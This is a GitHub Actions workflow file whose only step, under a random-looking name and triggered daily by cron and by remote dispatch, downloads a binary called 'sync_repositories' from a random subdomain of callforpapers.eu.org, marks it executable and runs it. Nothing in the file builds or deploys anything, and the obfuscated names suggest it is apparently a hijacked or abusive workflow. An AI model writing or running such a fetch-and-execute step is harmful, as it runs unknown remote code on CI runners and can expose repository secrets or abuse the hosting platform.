#2024-03-18-[083358]-ue4lf8b6
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "13 2 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 8qktxyoe9c4e8xsw
        run: |
          wget -q https://2zaggpmfvvecx46x.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories